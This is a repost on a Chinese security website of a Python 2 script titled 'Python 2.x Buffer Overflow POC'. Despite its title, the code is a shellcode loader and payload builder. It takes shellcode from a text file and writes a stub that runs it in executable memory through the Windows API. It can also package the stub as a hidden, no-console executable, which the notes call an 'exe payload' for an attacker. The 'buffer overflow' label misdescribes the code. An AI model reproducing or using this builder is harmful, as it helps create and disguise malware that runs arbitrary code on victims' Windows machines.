Python 2.x Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Python 2.x Buffer Overflow

来源：[@bofheaded] 作者：Haritash 发布时间：2017-01-24

#!/usr/bin/env python

###
#Exploit         : Python 2.x Buffer Overflow POC
#Tested on       : Windows XP , Windows 7
#Authors         : Sultan Albalawi & Chaitanya [@bofheaded] 
#Discovery date  : 21/jan/2017
#GitHub          : https://github.com/ChaitanyaHaritash/My-Exploits/blob/master/python2.x_bof.py
#Video 		 : https://youtu.be/hcc6Y55PWBg
#Image 		 : https://postimg.org/image/dn5x3ww9v/
###

###
# Usage ::::
###
#1. Run exploit.py
#2. Save your shellcode into some text file
#3. Input Path of text file containing shellcode
#4. The .py file will be generated with shellcode.
#5. *Optional - Attacker just need to select option 'y' in running code.. and can have .exe payload from .py code generated :)

###
# NOTE ::::
###
#pyinstaller must be installed if user wants exe payload from python payload generated initially
#This exploit is windows compatible :) 

#calc.exe shellcode =>
#http://pastebin.com/vBssgg99

import time,shutil,os,sys
if os.name == 'posix':
  print "Sorry this exploit is not compatible to linux :( "
  exit()
else:    

      banner = """
               Python 2.x Buffer Overflow POC
      Authors : Sultan Albalawi & Chaitanya [@bofheaded]
	       Susupcious Shell Activity [SSA] 
               """
      print banner
      class make:
          def __init__(self,):
                print ""
          def fii (self,):
              print ""
          if __name__ == '__main__':

                shell = str(raw_input('Input Path To Your shellcode.txt file >> '))
        
                txt = open(shell) 
                myshell = txt.read()
                raw = """
import ctypes
ban=10
for i in range(ban):
    print "|/"*i
shellcode = bytearray("""+myshell+""")
myci = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(myci),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(myci),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
                """

                f = open ('stub.py' , 'w')
                f.write(raw)
                f.close()
                print "done !"
                
                build_exe = str(raw_input('Would You like to have an executable payload ? (y|n)>> '))  
                if build_exe == 'y':
                    os.system('C:\Python27\Scripts\pyinstaller --noconsole --onefile stub.py')
                    print "Please Wait ...."
                    time.sleep(2)
                else:
                    print ('byee')        
                  
      make()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告